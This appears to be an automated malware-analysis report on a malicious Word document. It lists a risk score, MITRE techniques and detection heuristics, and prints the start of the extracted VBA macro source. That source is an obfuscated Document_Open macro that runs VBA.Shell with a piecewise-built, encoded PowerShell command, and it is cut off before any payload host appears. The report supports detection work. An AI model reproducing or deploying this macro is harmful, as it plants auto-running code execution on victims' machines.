MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the 'Document_Open' macro uses the Shell() function to execute commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection name 'Doc.Malware.Valyria-6803403-0' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6803403-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6803403-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16057 bytes |
SHA-256: 3972cebc9a514bd96b3a6395f12ae20c9bacee25b0000af7f97f107d5d536e01 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "fptvwWSGzM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zAXCqIZhp()
On Error Resume Next
XdOAEU = 35047 + WEFPVq + (70562 * CDbl(lVaCi) - oLKITf / CSng(18777) - ClZIj / Hex(jdQrui) + 46586 - 62600)
ulGpL = rtUqii
Ebzup = pwAmj - BTqNG / 73978 / IFiHwF - 223327908 + Hex(KlSRZ) * WhhzKo - Round(17192)
ZqBGX = Sqr(67019)
QVUBph = 87223 + djNtv + (39606 * CDbl(tDRdNV) - sztwcc / CSng(3339) - WFFwQM / Hex(Izbjiq) + 14181 - 90948)
nUqICG = hjcuUj
TEfcVI = EQCoMH - zDYQuR / 4210 / mukDkm - 223327908 + Hex(jLPtO) * rkkHzJ - Round(43708)
LKwpZ = Sqr(55952)
qSlrRX = 8291 + kqYStB + (14842 * CDbl(oIuIf) - GsqQP / CSng(49520) - Jmlia / Hex(ZzsqcE) + 71063 - 65449)
jCunV = GXZiL
jCIfM = BAHiZb - nkSFi / 36800 / SSEucQ - 223327908 + Hex(OWwUZ) * WBjRQM - Round(13433)
icuTFn = Sqr(65980)
RwOCvi = 76242 + LJzAil + (7552 * CDbl(oVMGc) - diWjXW / CSng(89562) - wFpYji / Hex(ORcCL) + 17928 - 31522)
pUaLGk = rbOWUl
HfVTU = jPHRjd - uLJBV / 95856 / EjDQoN - 223327908 + Hex(QdRiU) * zzJCP - Round(27223)
FCFna = Sqr(48991)
zAXCqIZhp = PNJokQuhhl + VBA.Shell(cwiTROBCw + Chr(KGciWbF + vbKeyP + zzoiCSzFcYk) + "owers" + YLKFj + djdRiq + pvTWkbwGk + ENrQsnqaKVz + HVRHPCRn, 25149 - 25149)
zwYcEf = 12662 + PlpjP + (40092 * CDbl(wCGlH) - rBORpI / CSng(16557) - VkOQr / Hex(BZjwk) + 14568 - 27501)
iCUlb = ESusDS
slRKC = vJLPX - EtBbTY / 22302 / XVIBz - 223327908 + Hex(YljPd) * RjdwwF - Round(78643)
QfCLL = Sqr(83033)
ziwXdP = 20847 + iJZvma + (62588 * CDbl(QDiNj) - GHzap / CSng(81384) - AWffp / Hex(mlGVhu) + 97072 - 36382)
FQViM = JYOEj
ZVDpX = XCaUni - uQwctk / 19516 / zTlrKQ - 223327908 + Hex(iCNOr) * FKlIP - Round(88693)
qZwmdn = Sqr(16502)
End Function
Private Sub Document_open()
On Error Resume Next
cCSwMa = 97074 + XHZrc + (78971 * CDbl(KTiqb) - qtaGC / CSng(38879) - isdLt / Hex(cHTKCT) + 68812 - 87643)
SGZKkI = JzJjDw
FMWOlJ = rKGiui - NwvMwr / 18793 / WsVHap - 223327908 + Hex(WNLpC) * wWTqw - Round(52014)
SltfHD = Sqr(78526)
dpisdi = 5925 + otXEbE + (27987 * CDbl(cVzQrk) - rWDlR / CSng(35123) - SFsWvJ / Hex(bMQXoC) + 38500 - 57036)
rNAzE = XvkuFz
psjnVa = lLCaRM - JFjAJ / 68240 / ChpNcb - 223327908 + Hex(Hwdtz) * hCdEF - Round(74254)
ckJTIY = Sqr(12153)
zAXCqIZhp
omLqZ = 86154 + wiNZhR + (1937 * CDbl(HciuW) - GZhwB / CSng(89637) - aDOVd / Hex(XurmfN) + 77732 - 43358)
mcztM = WaEkHP
bFMtG = MduYws - azEDp / 57290 / Qpzhiu - 223327908 + Hex(KHkHNH) * bIIkW - Round(79665)
PZLuj = Sqr(96688)
mGfLL = 67530 + VJRkl + (27178 * CDbl(qwTSou) - zsSmt / CSng(33403) - mcBKmE / Hex(BdZKGj) + 84085 - 67908)
NsGOvA = QVHFDU
OazoNM = SRHjj - ZzJIp / 36470 / IiOLND - 223327908 + Hex(cGiVNo) * wMFBn - Round(31816)
iJmiZZ = Sqr(78147)
End Sub
Attribute VB_Name = "soZIDaE"
Function YLKFj()
On Error Resume Next
uwDMuI = dRplWj
VZhMb = Sqr(48979)
mfwnrs = 54710 + Pfslm + (32014 * CDbl(EOLQSR) - CXwGTo / CSng(8110) - hvZcNZ / Hex(zjNVci) + 46560 - 39541)
OPJda = kZnNcw - MKCWIQ / 55092 / wptdD - 223327908 + Hex(ltGrMH) * KNEwVG - Round(97071)
iMCaCbDSkGc = "HeLL " + " . ( $EnV:Com" + "SPEc[4,15,25]" + "-JoiN'') ( -J"
hOGaYw = XLEKw
pkRuNY = Sqr(72096)
RZQzX = 7568 + jjWQqG + (3793 * CDbl(wZnKiP) - bnDfr / CSng(51090) - vmBLn / Hex(nozzCz) + 14229 - 748)
zSnBw = vrMYKl - OfSIKK / 55166 / IfHPjz - 223327908 + Hex(NzNzJ) * Bszro - Round(21983)
wihtHWsO = "OI" + "N ((" + "46 , 80 , 90 " + ",105 , 10" + "7, 73,42, 55,4" + "2 , " + "100, 111,125"
FpazO = aEzlD
bbOkn = Sqr(88958)
Ibrnf = 73812 + iciOL + (24158 * CDbl(NMmTRV) - bjSEKA / CSng(53970) - OOMJj / Hex(vKETF) + 48928 - 62710)
SfUhO = rYiVlm - NQCCc / 50788 / ChzLw - 223327908 + Hex(BIrqZ) * hIwir - Round(54540)
hVdWjisBzvz = ", 39," + " 101,104" + ", 96," + " 11" + "1, 10" + "5, 126,42 , 12"
TDmVw = mYMKY
mVEdC = Sqr(88987)
HMbLk = 62519 + kwjih + (85785 * CDbl(YFzQiK) - IHOPM / CSng(2144) - JtpwSd / Hex(AFwMB) + 68
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.